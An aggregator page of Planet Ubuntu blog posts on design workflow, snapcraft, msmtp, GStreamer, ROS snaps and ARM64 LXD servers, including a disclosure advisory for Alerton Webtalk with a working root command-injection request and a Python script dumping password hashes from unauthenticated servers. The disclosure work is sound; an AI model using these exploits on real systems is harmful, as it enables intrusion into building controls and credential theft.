Quantcast
Channel: Planet Ubuntu
Viewing all 17727 articles
Browse latest View live

Canonical Design Team: Designing in the open

$
0
0

Over the past year, a change has emerged in the design team here at Canonical: we’ve started designing our websites and apps in public GitHub repositories, and therefore sharing the entire design process with the world.

One of the main things we wanted to improve was the design sign off process whilst increasing visibility for developers of which design was the final one among numerous iterations and inconsistent labelling of files and folders.

Here is the process we developed and have been using on multiple projects.

The process

Design work items are initiated by creating a GitHub issue on the design repository relating to the project. Each project consists of two repositories: one for the code base and another for designs. The work item issue contains a short descriptive title followed by a detailed description of the problem or feature.

Once the designer has created one or more designs to present, they upload them to the issue with a description. Each image is titled with a version number to help reference in subsequent comments.

Whenever the designer updates the GitHub issue everyone who is watching the project receives an email update. It is important for anyone interested or with a stake in the project to watch the design repositories that are relevant to them.

The designer can continue to iterate on the task safe in the knowledge that everyone can see the designs in their own time and provide feedback if needed. The feedback that comes in at this stage is welcomed, as early feedback is usually better than late.

As iterations of the design are created, the designer simply adds them to the existing issue with a comment of the changes they made and any feedback from any review meetings.

Table with actions design from MAAS project

When the design is finalised a pull request is created and linked to the GitHub issue, by adding “Fixes #111” (where #111 is the number of the original issue) to the pull request description. The pull request contains the final design in a folder structure that makes sense for the project.

Just like with code, the pull request is then approved by another designer or the person with the final say. This may seem like an extra step, but it allows another person to look through the issue and make sure the design completes the design goal. On smaller teams, this pull request can be approved by a stakeholder or developer.

Once the pull request is approved it can be merged. This will close and archive the issue and add the final design to the code section of the design repository.

That’s it!

Benefits

If all designers and developers of a project subscribe to the design repository, they will be included in the iterative design process with plenty of email reminders. This increases the visibility of designs in progress to stakeholders, developers and other designers, allowing for wider feedback at all stages of the design process.

Another benefit of this process is having a full history of decisions made and the evolution of a design all contained within a single page.

If your project is open source, this process makes your designs available to your community or anyone that is interested in the product automatically. This means that anyone who wants to contribute to the project has access to all the information and assets as the team members.

The code section of the design repository becomes the home for all signed off designs. If a developer is ever unsure as to what something should look like, they can reference the relevant folder in the design repository and be confident that it is the latest design.

Canonical is largely a company of remote workers and sometimes conversations are not documented, this means some people will be aware of the decisions and conversations. This design process has helped with the issue, as designs and discussions are all in a single place, with nicely laid out emails for all changes that anyone may be interested.

Conclusion

This process has helped our team improve velocity and transparency. Is this something you’ve considered or have done in your own projects? Let us know in the comments, we’d love to hear of any way we can improve the process.


Alan Pope: April Snapcraft Docs Day

$
0
0

Continuing Snapcraft Docs Days

In March we had our first Snapcraft Docs Day on the last Friday of the month. It was fun and successful so we're doing it again this Friday, 28th April 2017. Join us in #snapcraft on Rocket Chat and on the snapcraft forums

Flavour of the month

This month's theme is 'Flavours', specifically Ubuntu Flavours. We've worked hard to make the experience of using snapcraft to build snaps as easy as possible. Part of that work was to ensure it works as expected on all supported Ubuntu flavours. Many of us run stock Ubuntu and despite our best efforts, may not have caught certain edge cases only apparent on flavours.

If you're running an Ubuntu flavour, then we'd love to hear how we did. Do the tutorials we've written work as expected? Is the documentation clear, unambiguous and accurate? Can you successfully create a brand new snap and publish it to the store using snapcraft on your flavour of choice?

Soup of the day

On Friday we'd love to hear about your experiences on an Ubuntu flavour of doing things like:-

Happy Hour

On the subject of snapping other people's projects. Here's some tips we think you may find useful.

  • Look for new / interesting open source projects on github trending projects such as trending python projects or trending go projects, or perhaps recent show HN submissions.
  • Ask in #snapcraft on Rocket Chat if others have already started on a snap, to avoid duplication & collaborate.
  • Avoid snapping frameworks, libraries, but focus more atomic tools, utilities and full applications
  • Start small. Perhaps choose command line or server-based applications, as they're often easier for the beginner than full fat graphical desktop applications.
  • Pick applications written in languages you're familiar with. Although not compulsory, it can help when debugging
  • Contribute upstream. Once you have a prototype or fully working snap, contribute the yaml to the upstream project, so they can incorporate it in their release process
  • Consider uploading the application to the store for wider testing, but be prepared to hand the application over to the upstream developer if they request it

Finally, if you're looking for inspiration, join us in #snapcraft on Rocket Chat and ask! We've all got our own pet projects we'd like to see snapped.

Food for thought

Repeated from last time, here's a handy reference of the projects we work on with their repos and bug trackers:-

ProjectSourceIssue Tracker
SnapdSnapd on GitHubSnapd bugs on Launchpad
SnapcraftSnapcraft on GitHubSnapcraft bugs on Launchpad
Snapcraft DocsSnappy-docs on GitHubSnappy-docs issues on GitHub
TutorialsTutorials on GitHubTutorials issues on GitHub

Joe Barker: Configuring msmtp on Ubuntu 16.04

$
0
0

I previously wrote an article around configuring msmtp on Ubuntu 12.04, but as I hinted at in my previous post that sort of got lost when the upgrade of my host to Ubuntu 16.04 went somewhat awry. What follows is essentially the same post, with some slight updates for 16.04. As before, this assumes that you’re using Apache as the web server, but I’m sure it shouldn’t be too different if your web server of choice is something else.

I use msmtp for sending emails from this blog to notify me of comments and upgrades etc. Here I’m going to document how I configured it to send emails via a Google Apps account, although this should also work with a standard Gmail account too.

To begin, we need to install 3 packages:
sudo apt-get install msmtp msmtp-mt ca-certificates
Once these are installed, a default config is required. By default msmtp will look at /etc/msmtprc, so I created that using vim, though any text editor will do the trick. This file looked something like this:

# Set defaults.
defaults
# Enable or disable TLS/SSL encryption.
tls on
tls_starttls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
# Setup WP account's settings.
account <MSMTP_ACCOUNT_NAME>
host smtp.gmail.com
port 587
auth login
user <EMAIL_USERNAME>
password <PASSWORD>
from <FROM_ADDRESS>
logfile /var/log/msmtp/msmtp.log

account default : <MSMTP_ACCOUNT_NAME>

Any of the uppercase items (i.e. <PASSWORD>) are things that need replacing specific to your configuration. The exception to that is the log file, which can of course be placed wherever you wish to log any msmtp activity/warnings/errors to.

Once that file is saved, we’ll update the permissions on the above configuration file — msmtp won’t run if the permissions on that file are too open — and create the directory for the log file.

sudo mkdir /var/log/msmtp
sudo chown -R www-data:adm /var/log/msmtp
sudo chmod 0600 /etc/msmtprc

Next I chose to configure logrotate for the msmtp logs, to make sure that the log files don’t get too large as well as keeping the log directory a little tidier. To do this, we create /etc/logrotate.d/msmtp and configure it with the following file. Note that this is optional, you may choose to not do this, or you may choose to configure the logs differently.

/var/log/msmtp/*.log {
rotate 12
monthly
compress
missingok
notifempty
}

Now that the logging is configured, we need to tell PHP to use msmtp by editing /etc/php/7.0/apache2/php.ini and updating the sendmail path from
sendmail_path =
to
sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> -t"
Here I did run into an issue where even though I specified the account name it wasn’t sending emails correctly when I tested it. This is why the line account default : <MSMTP_ACCOUNT_NAME> was placed at the end of the msmtp configuration file. To test the configuration, ensure that the PHP file has been saved and run sudo service apache2 restart, then run php -a and execute the following

mail ('personal@email.com', 'Test Subject', 'Test body text');
exit();

Any errors that occur at this point will be displayed in the output so should make diagnosing any errors after the test relatively easy. If all is successful, you should now be able to use PHPs sendmail (which at the very least WordPress uses) to send emails from your Ubuntu server using Gmail (or Google Apps).

I make no claims that this is the most secure configuration, so if you come across this and realise it’s grossly insecure or something is drastically wrong please let me know and I’ll update it accordingly.

Harald Sitter: KDE neon CMake Package Validation

$
0
0

In KDE neon‘s constant quest of raising the quality bar of KDE software and neon itself, I added a new tool to our set of quality assurance tools. CMake Package QA is meant to ensure that find_package() calls on CMake packages provided by config files (e.g. FooConfig.cmake files) do actually work.

The way this works is fairly simple. For just about every bit of KDE software we have packaged, we install the individual deb packages including dependencies one after the other and run a dummy CMakeLists.txt on any *Config.cmake file in that package.

As an example, we have libkproperty3-dev as a deb package. It contains KPropertyWidgetsConfig.cmake. We install the package and its dependencies, construct a dummy file, and run cmake on it during our cmake linting.

cmake_minimum_required(VERSION 3.0)
find_package(KPropertyWidgets REQUIRED)

This tests that running KPropertyWidgetsConfig.cmake works, ensuring that the cmake code itself is valid (bad syntax, missing includes, what have you…) and that our package is sound and including all dependencies it needs (to for example meet find_dependency macro calls).

As it turns out libkproperty3-dev is of insufficient quality. What a shame.

Sebastian Dröge: RTP for broadcasting-over-IP use-cases in GStreamer: PTP, RFC7273 for Ravenna, AES67, SMPTE 2022 & SMPTE 2110

$
0
0

It’s that time of year again where the broadcast industry gathers at NAB show, which seems like a good time to me to revisit some frequently asked questions about GStreamer‘s support for various broadcasting related standards

Even more so as at this year’s NAB there seems to be a lot of hype about the new SMPTE 2110 standard, which defines how to transport and synchronize live media streams over IP networks, and which fortunately (unlike many other attempts) is based on previously existing open standards like RTP.

While SMPTE 2110 is the new kid on the block here, there are various other standards based on similar technologies. There’s for example AES67 by the Audio Engineering Society for audio-only, Ravenna which is very similar, the slightly older SMPTE 2022 and VSF TR3/4 by the Video Services Forum.

Other standards, like MXF for storage of media (which is supported by GStreamer since years), are also important in the broadcasting world, but let’s ignore these other use-cases here for now and focus on streaming live media.

Media Transport

All of these standards depend on RTP in one way or another, use PTP or similar services for synchronization and are either fully (as in the case of AES67/Ravenna) supported by GStreamer already or at least to a big part, with the missing parts being just some extensions to existing code.

There’s not really much to say here about the actual media transport as GStreamer has had solid support for RTP for a very long time and has a very flexible and feature-rich RTP stack that includes support for many optional extensions to RTP and is successfully used for broadcasting scenarios, real-time communication (e.g. WebRTC and SIP) and live-video streaming as required by security cameras for example.

Over the last months and years, many new features have been added to GStreamer’s RTP stack for various use-cases and the code was further optimized, and thanks to all that the amount of work needed for new standards based on RTP, like the beforementioned ones, is rather limited. For AES67 no additional work was needed to support it, for example.

The biggest open issue for the broadcasting-related standards currently is the need of further optimizations for high-resolution, high-framerate streaming of video. In these cases we currently run into performance problems due to the high amount of packets per second, and some serious optimizations would be needed. However there are already various ideas how to improve this situation that are just waiting to be implemented.

Synchronization

I previously already wrote about PTP in GStreamer, which is supported in GStreamer for synchronizing media and that support is now merged and has been included since the 1.8 release. In addition to that NTP is also supported now since 1.8.

In theory other clocks could also be used in some scenarios, like clocks based on a GPS receiver, but that’s less common and not yet supported by GStreamer. Nonetheless all the infrastructure for supporting arbitrary clocks exists, so adding these when needed is not going to be much work.

Clock Signalling

One major new feature that was added in the last year, for the 1.10 release of GStreamer, was support for RFC7273. While support for PTP in theory allows you to synchronize media properly if both sender and receiver are using the same clock, what was missing before is a way to signal what this specific clock exactly is and what offsets have to be applied. This is where RFC7273 becomes useful, and why it is used as part of many of the standards mentioned before. It defines a common interface for specifying this information in the SDP, which commonly is used to describe how to set up an RTP session.

The support for that feature was merged for the 1.10 release and is readily available.

Help needed? Found bugs or missing features?

While the basics are all implemented in GStreamer, there are still various missing features for optional extensions of the before mentioned standards or even, in some cases, required parts of the standard. In addition to that some optimizations may still be required, depending on your use-case.

If you run into any problems with the existing code, or need further features for the various standards implemented, just drop me a mail.

GStreamer is already used in the broadcasting world in various areas, but let’s together make sure that GStreamer can easily be used as a batteries-included solution for broadcasting use-cases too.

David Tomaschik: Security Issues in Alerton Webtalk (Auth Bypass, RCE)

$
0
0

Introduction

Vulnerabilities were identified in the Alerton Webtalk Software supplied by Alerton. This software is used for the management of building automation systems. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive. Alerton has responded that Webtalk is EOL and past the end of its support period. Customers should move to newer products available from Alerton. Thanks to Alerton for prompt replies in communicating with us about these issues.

Versions 2.5 and 3.3 were both confirmed to be affected by these issues.

(This blog post is a duplicate of the advisory I sent to the full-disclosure mailing list.)

Webtalk-01 - Password Hashes Accessible to Unauthenticated Users

Severity: High

Password hashes for all of the users configured in Alerton Webtalk are accessible via a file in the document root of the ‘webtalk’ user. The location of this file is configuration dependent, however the configuration file is accessible as well (at a static location, /~webtalk/webtalk.ini). The password database is a sqlite3 database whose name is based on the bacnet rep and job entries from the ini file.

A python proof of concept to reproduce this issue is in an appendix.

Recommendation: Do not store sensitive data within areas being served by the webserver.

Webtalk-02 - Command Injection for Authenticated Webtalk Users

Severity: High

Any user granted the “configure webtalk” permission can execute commands as the root user on the underlying server. There appears to be some effort of filtering command strings (such as rejecting commands containing pipes and redirection operators) but this is inadequate. Using this vulnerability, an attacker can add an SSH key to the root user’s authorized_keys file.

1
2
3
4
5
6
7
8
9
10
11
12
GET
/~webtalk/WtStatus.psp?c=update&updateopts=&updateuri=%22%24%28id%29%22&update=True
HTTP/1.1
Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101
Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1
1
2
3
4
5
6
7
8
9
10
11
12
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801

...
uid=0(root) gid=500(webtalk) groups=500(webtalk)
...

Recommendation: User input should be avoided to shell commands. If this is not possible, shell commands should be properly escaped. Consider using one of the functions from the subprocess module without the shell=True parameter.

Webtalk-03 - Cross-Site Request Forgery

Severity: High

The entire Webtalk administrative interface lacks any controls against Cross-Site Request Forgery. This allows an attacker to execute administrative changes without access to valid credentials. Combined with the above vulnerability, this allows an attacker to gain root access without any credentials.

Recommendation: Implement CSRF tokens on all state-changing actions.

Webtalk-04 - Insecure Credential Hashing

Severity: Moderate

Password hashes in the userprofile.db database are hashed by concatenating the password with the username (e.g., PASSUSER) and performing a plain MD5 hash. No salts or iterative hashing is performed. This does not follow password hashing best practices and makes for highly practical offline attacks.

Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.

Webtalk-05 - Login Flow Defeats Password Hashing

Severity: Moderate

Password hashing is performed on the client side, allowing for the replay of password hashes from Webtalk-01. While this only works on the mobile login interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting session is able to access all resources and is functionally equivalent to a login through the Java-based login flow.

Recommendation: Perform hashing on the server side and use TLS to protect secrets in transit.

Timeline

  • 2017/01/?? - Issues Discovered
  • 2017/01/26 - Issues Reported to security () honeywell com
  • 2017/01/30 - Initial response from Alerton confirming receipt.
  • 2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
  • 2017/04/26 - This disclosure

Discovery

These issues were discovered by David Tomaschik of the Google ISA Assessments team.

Appendix A: Script to Extract Hashes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
importrequestsimportsysimportConfigParserimportStringIOimportsqlite3importtempfileimportosdefget_webtalk_ini(base_url):"""Get the webtalk.ini file and parse it."""url='%s/~webtalk/webtalk.ini'%base_urlr=requests.get(url)ifr.status_code!=200:raiseRuntimeError('Unable to get webtalk.ini: %s',url)buf=StringIO.StringIO(r.text)parser=ConfigParser.RawConfigParser()parser.readfp(buf)returnparserdefget_db_path(base_url,config):rep=config.get('bacnet','rep')job=config.get('bacnet','job')url='%s/~webtalk/bts/%s/%s/userprofile.db'returnurl%(base_url,rep,job)defload_db(url):"""Load and read the db."""r=requests.get(url)ifr.status_code!=200:raiseRuntimeError('Unable to get %s.'%url)tmpfd,tmpname=tempfile.mkstemp(suffix='.db')tmpf=os.fdopen(tmpfd,'w')tmpf.write(r.content)tmpf.close()con=sqlite3.connect(tmpname)cur=con.cursor()cur.execute("SELECT UserID, UserPassword FROM tblPassword")results=cur.fetchall()con.close()os.unlink(tmpname)returnresultsdefusers_for_server(base_url):if'://'notinbase_url:base_url='http://%s'%base_urlini=get_webtalk_ini(base_url)db_path=get_db_path(base_url,ini)returnload_db(db_path)if__name__=='__main__':forhostinsys.argv[1:]:try:users=users_for_server(host)exceptExceptionasex:sys.stderr.write('%s\n'%str(ex))continueforuinusers:print'%s:%s'%(u[0],u[1])

Ubuntu Podcast from the UK LoCo: S10E08 – Rotten Hospitable Statement - Ubuntu Podcast

$
0
0

We discuss what is going on over at System76 with Emma Marshall, help protect your bits with some Virtual Private Love and go over your feedback.

It’s Season Ten Episode Eight of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Emma Marshall are connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Ubuntu Insights: ROS production: obtaining confined access to the Turtlebot [4/5]

$
0
0

This is a guest post by Kyle Fazzari, Software Engineer. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

This is the fourth blog post in this series about ROS production. In the previous post we created a snap of our prototype, and released it into the store. In this post, we’re going to work toward an Ubuntu Core image by creating what’s called a gadget snap. A gadget snap contains information such as the bootloader bits, filesystem layout, etc., and is specific to the piece of hardware running Ubuntu Core. We don’t need anything special in that regard (read that link if you do), but the gadget snap is also currently the only place on Ubuntu Core and snaps in general where we can specify our udev symlink rule in order to obtain confined access to our Turtlebot (i.e. allow our snap to be installable and workable without devmode). Eventually there will be a way to do this without requiring a custom gadget, but this is how it’s done today.

Alright, let’s get started. Remember that this is also a video series: feel free to watch the video version of this post:

Step 1: Start with an existing gadget

Canonical publishes gadget snaps for all reference devices, including generic amd64, i386, as well as the Raspberry Pi 2 and 3, and the DragonBoard 410c. If the computer on which you’re going to install Ubuntu Core is among these, you can start with a fork of the corresponding official gadget snap maintained in the github.com/snapcore organization. Since I’m using a NUC, I’ll start with a fork of pc-amd64-gadget (my finished gadget is available for reference, and here’s one for the DragonBoard). If you’re using a different reference device, fork that gadget and you can still follow the rest of these steps.

Step 2: Select a name for your gadget snap

Open the snapcraft.yaml included in your gadget snap fork. You’ll see the same metadata we discussed in the previous post. Since snap names are globally unique, you need to decide on a different name for your gadget. For example, I selected pc-turtlebot-kyrofa. Once you settle on one, register it:

$ snapcraft register my-gadget-snap-name

If the registration succeeded, change the snapcraft.yaml to reflect the new name. You can also update the summary, description, and version as necessary.

Step 3: Add the required udev rule

If you’ll recall, back in the second post in this series, we installed a udev rule to ensure that the Turtlebot showed up at /dev/kobuki. Take a look at that rule:

$ cat /etc/udev/rules.d/57-kobuki.rules
# On precise, for some reason, USER and GROUP are getting ignored.
# So setting mode = 0666 for now.
SUBSYSTEM=="tty", ATTRS{idVendor}=="0403", ATTRS{idProduct}=="6001", ATTRS{serial}=="kobuki*", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"
# Bluetooth module (currently not supported and may have problems)
# SUBSYSTEM=="tty", ATTRS{address}=="00:00:00:41:48:22", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"

It’s outside the scope of this series to explain udev in depth, but the two values I’ve made bold are how the Kobuki base is uniquely identified. We’re going to write the snapd version of this rule, using the same values. At the end of the gadget’s snapcraft.yaml, add the following slot definition:

# Custom serial-port interface for the Turtlebot 2
slots:
  kobuki:
    interface: serial-port
    path: /dev/serial-port-kobuki
    usb-vendor: 0x0403
    usb-product: 0x6001

The name of the slot being defined is kobuki. The symlink path we’re requesting is /dev/serial-port-kobuki. Why not /dev/kobuki? Because snapd only supports namespaced serial port symlinks to avoid conflicts. You can use whatever you like for this path (and the slot name), but make sure to follow the /dev/serial-port-<whatever> pattern, and adjust the rest of the directions in this series accordingly.

Step 4: Build the gadget snap

This step is easy. Just get into the gadget snap directory and run:

$ snapcraft

In the end, you’ll have a gadget snap.

Step 5: Put the gadget snap in the store

You don’t technically need the gadget snap in the store just to create an image, but there are two reasons you will want it there:

  1. Without putting it in the store you have no way of updating it in the future
  2. Without putting it in the store it’s impossible for the serial-port interface we just added to be automatically connected to the snap that needs it, which means the image won’t make the robot move out of the box

Since you’ve already registered the snap name, just push it up (we want our image based on the stable channel, so let’s release into that):

$ snapcraft push /path/to/my/gadget.snap --release=stable

You will in all likelihood receive an error saying it’s been queued for manual review since it’s a gadget snap. It’s true, right now gadget snaps require manual review (although that will change soon). You’ll need to wait for this review to complete successfully before you can take advantage of it actually being in the store (make a post in the store category of the forum if it takes longer than you expect), but you can continue following this series while you wait. I’ll highlight things you’ll need to do differently if your gadget snap isn’t yet available in the store.

Step 6: Adjust our ROS snap to run under strict confinement

As you’ll remember, our ROS snap currently only runs with devmode, and still assumes the Turtlebot is available at /dev/kobuki. We know now that our gadget snap will make the Turtlebot available via a slot at /dev/serial-port-kobuki, so we need to alter our snap slightly to account for this. Fortunately, when we initially created the prototype, we made the serial port configurable. Good call on that! Let’s edit our snapcraft.yaml a bit:

name: my-turtlebot-snap
version: '0.2'
summary: Turtlebot ROS Demo
description: |
  Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

grade: stable

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

parts:
  prototype-workspace:
    plugin: catkin
    rosdistro: kinetic
    catkin-packages: [prototype]

plugs:
  kobuki:
    interface: serial-port

apps:
  system:
    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple

Most of this is unchanged from version 0.1 of our snap that we discussed in the previous post. I’ve made the relevant sections bold; let’s cover them individually.

version: 0.2

We’re modifying the snap here, so I suggest changing the version. This isn’t required (the version field is only for human consumption, it’s not used to determine which snap is newest), but it certainly makes support easier (“what version of the snap are you on?”).

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

You wrote such a nice comment, it hardly needs more explanation. The point is, now that we have a gadget that makes this device accessible, we can switch to using strict confinement.

plugs:
  kobuki:
    interface: serial-port

This one defines a new plug in this snap, but then says “the kobuki plug is just a serial-port plug.” This is optional, but it’s handy to have our plug named kobuki instead of the more generic serial-port. If you opt to leave this off, keep it in mind for the following section.

apps:
  system:
    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple

Here we take advantage of the flexibility we introduced in the second post of the series, and specify that our launch file should be launched with device_port set to the udev symlink defined by the gadget instead of the default /dev/kobuki. We also specify that this app should utilize the kobuki plug defined directly above it, which grants it confined access to the serial port.

Rebuild your snap, and release the updated version into the store as we covered in part 3, but now you can release to the stable channel. Note that this isn’t required, but the reasons for putting this snap in the store are the same as the reasons for putting the gadget in the store (namely, updatability and interface auto-connection).

In the next (and final) post in this series, we’ll put all these pieces together and create an Ubuntu Core image that is ready for the factory.


Xubuntu: Xubuntu Quality Assurance team is spreading out

$
0
0

Up until the start of the 17.04 cycle the Xubuntu Quality Assurance team had been led by one person. During the last cycle, a break was needed by that person. The recent addition of Dave Pearson to the team meant we were in a position to call on someone else to lead the team.

Today, we’re pleased to announce that Dave will be carrying on as a team lead. However, starting with the artfully named Artful Aardvark cycle, we will migrate to a Quality Assurance team with two leads who will be sharing duties during development cycles.

While Dave was in control of the show during 17.04, Kev was spending more time upstream with Xfce, involving himself in testing GTK3 ports with Simon. The QA team plans to continue this split roughly from this point; Dave will be running the daily Xubuntu QA and Kev will focus more on the QA for Xfce. For the most part it is unlikely that much change will be seen by most, given that for the most part we’re quiet during a cycle (QA team notes: even if the majority of -dev mailing list posts come from us…) – other than shouting when things need you all to join in.

While it is obvious to most that there are deep connections between Xubuntu and Xfce, we hope that this change will bring more targetted testing of the new GTK3 Xfce packages. You will start to see more calls for testing of packages before they reach Xubuntu on the Xubuntu development mailing list. Case in point, the recent requests for people to test Thunar and patches direct from the Xfce Git repositories – though up until now this has come via Launchpad bug reports.

On a positive note this change has solely been possible by the creation of the Xubuntu QA Launchpad team some cycles ago. Specifically set up to allow people from the community to be brought in to the Xubuntu setup and from there become members of the Xubuntu team itself. People do get noticed on the tracker and they do get noticed on our IRC channels. Our hope is that we are able to increase the numbers of people in Xubuntu QA from the few we currently have. Increasing numbers of people involved, help us increase the quality and strength of the team directly.

Costales: Ubuntu y otras hierbas S01E01 [videopodcast] [spanish]

Simos Xenitellis: A closer look at the new ARM64 Scaleway servers and LXD

$
0
0

Scaleway has been offering ARM (armv7) cloud servers (baremetal) since 2015 and now they have ARM64 (armv8, from Cavium) cloud servers (through KVM, not baremetal).

But can you run LXD on them? Let’s see.

Launching a new server

We go through the management panel and select to create a new server. At the moment, only the Paris datacenter has availability of ARM64 servers and we select ARM64-2GB.

They use Cavium ThunderX hardware, and those boards have up to 48 cores. You can allocate either 2, 4, or 8 cores, for 2GB, 4GB, and 8GB RAM respectively. KVM is the virtualization platform.

There is an option of either Ubuntu 16.04 or Debian Jessie. We try Ubuntu.

It takes under a minute to provision and boot the server.

Connecting to the server

It runs Linux 4.9.23. Also, the disk is vda, specifically, /dev/vda. That is, there is no partitioning and the filesystem takes over the whole device.

Here is /proc/cpuinfo and uname -a. They are the two cores (from 48) as provided by KVM. The BogoMIPS are really Bogo on these platforms, so do not take them at face value.

Currently, Scaleway does not have their own mirror of the distribution packages but use ports.ubuntu.com. It’s 16ms away (ping time).

Depending on where you are, the ping times for google.com and www.google.com tend to be different. google.com redirects to www.google.com, so it somewhat makes sense that google.com reacts faster. At other locations (different country), could be the other way round.

This is /var/log/auth.log, and already there are some hackers trying to brute-force SSH. They have been trying with username ubnt. Note to self: do not use ubnt as the username for the non-root account.

The default configuration for the SSH server on Scaleway is to allow password authentication. You need to change this at /etc/ssh/sshd_config to look like

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

Originally, it was commented out, and had a default yes.

Finally, run

sudo systemctl reload sshd

This will not break your existing SSH session (even restart will not break your existing SSH session, how cool is that?). Now, you can create your non-root account. To get that user to sudo as root, you need to usermod -a -G sudo myusername.

There is a recovery console, accessible through the Web management screen. For this to work, it says that you first need to You must first login and set a password via SSH to use this serial console. In reality, the root account already has a password that has been set, and this password is stored in /root/.pw. It is not known how good this password is, therefore, when you boot a cloud server on Scaleway,

  1. Disable PasswordAuthentication for SSH as shown above and reload the sshd configuration. You are supposed to have already added your SSH public key in the Scaleway Web management screen BEFORE starting the cloud server.
  2. Change the root password so that it is not the one found at /root/.pw. Store somewhere safe that password, because it is needed if you want to connect through the recovery console
  3. Create a non-root user that can sudo and can do PubkeyAuthentication, preferably with username other than this ubnt.

Setting up ZFS support

The Ubuntu Linux kernels at Scaleway do not have ZFS support and you need to compile as a kernel module according to the instructions at https://github.com/scaleway/kernel-tools.

Actually, those instructions are apparently now obsolete with newer versions of the Linux kernel and you need to compile both spl and zfs manually, and install.

Naturally, when you compile spl and zfs, you can create .deb packages that can be installed in a nice and clean way. However, spl and zfs will originally create .rpm packages and then call alien to convert them to .deb packages. Then, we hit on some alien bug (no pun intended) which gives the error: zfs-0.6.5.9-1.aarch64.rpm is for architecture aarch64 ; the package cannot be built on this system which is weird since we are only working on aarch64.

The running Linux kernel on Scaleway for these ARM64 SoC has the following important files, http://mirror.scaleway.com/kernel/aarch64/4.9.23-std-1/

Therefore, run as root the following:

# Determine versions
arch="$(uname -m)"
release="$(uname -r)"
upstream="${release%%-*}"
local="${release#*-}"# Get kernel sources
mkdir -p /usr/src
wget -O "/usr/src/linux-${upstream}.tar.xz""https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-${upstream}.tar.xz"
tar xf "/usr/src/linux-${upstream}.tar.xz" -C /usr/src/
ln -fns "/usr/src/linux-${upstream}" /usr/src/linux
ln -fns "/usr/src/linux-${upstream}""/lib/modules/${release}/build"

# Get the kernel's .config and Module.symvers files
wget -O "/usr/src/linux/.config""http://mirror.scaleway.com/kernel/${arch}/${release}/config"
wget -O /usr/src/linux/Module.symvers "http://mirror.scaleway.com/kernel/${arch}/${release}/Module.symvers"

# Set the LOCALVERSION to the locally running local version (or edit the file manually)
printf'CONFIG_LOCALVERSION="%s"\n'"${local:+-$local}">> /usr/src/linux/.config

# Let's get ready to compile. The following are essential for the kernel module compilation.
apt install -y build-essential
apt install -y libssl-dev
make -C /usr/src/linux prepare modules_prepare

# Now, let's grab the latest spl and zfs (see http://zfsonlinux.org/).
cd /usr/src/
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-0.6.5.9/spl-0.6.5.9.tar.gz
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-0.6.5.9/zfs-0.6.5.9.tar.gz

# Install some dev packages that are needed for spl and zfs,
apt install -y uuid-dev
apt install -y dh-autoreconf
# Let's do spl first
tar xvfa spl-0.6.5.9.tar.gz
cd spl-0.6.5.9/
./autogen.sh
./configure      # Takes about 2 minutes
make             # Takes about 1:10 minutes
make install
cd ..

# Let's do zfs next
cd zfs-0.6.5.9/
tar xvfa zfs-0.6.5.9.tar.gz
./autogen.sh
./configure      # Takes about 6:10 minutes
make             # Takes about 13:20 minutes
make install

# Let's get ZFS loaded
depmod -a
ldconfig
modprobe zfs
zfs list
zpool list

And that’s it! The last two commands will show that there are no datasets or pools available (yet), meaning that it all works.

Setting up LXD

We are going to use a file (with ZFS) as the storage file. Let’s check what space we have left for this (from the 50GB disk),

root@scw-ubuntu-arm64:~# df -h /
Filesystem      Size  Used Avail Use% Mounted on
/dev/vda         46G  2.0G   42G   5% /

Initially, it was only 800MB used, now it is 2GB used. Let’s allocate 30GB for LXD.

LXD is not already installed on the Scaleway image (other VPS providers have alread LXD installed). Therefore,

apt install lxd

Then, we can run lxd init. There is a weird situation when you run lxd init. It takes quite some time for this command to show the first questions (choose storage backend, etc). In fact, it takes 1:42 minutes before you are prompted for the first question. When you subsequently run lxd init, you get at once the first question. There is quite some work that lxd init does for the first time, and I did not look into what it is.

root@scw-ubuntu-arm64:~# lxd init
Name of the storage backend to use (dir or zfs) [default=zfs]: 
Create a new ZFS pool (yes/no) [default=yes]? 
Name of the new ZFS pool [default=lxd]: 
Would you like to use an existing block device (yes/no) [default=no]? 
Size in GB of the new loop device (1GB minimum) [default=15]: 30
Would you like LXD to be available over the network (yes/no) [default=no]? 
Do you want to configure the LXD bridge (yes/no) [default=yes]? 
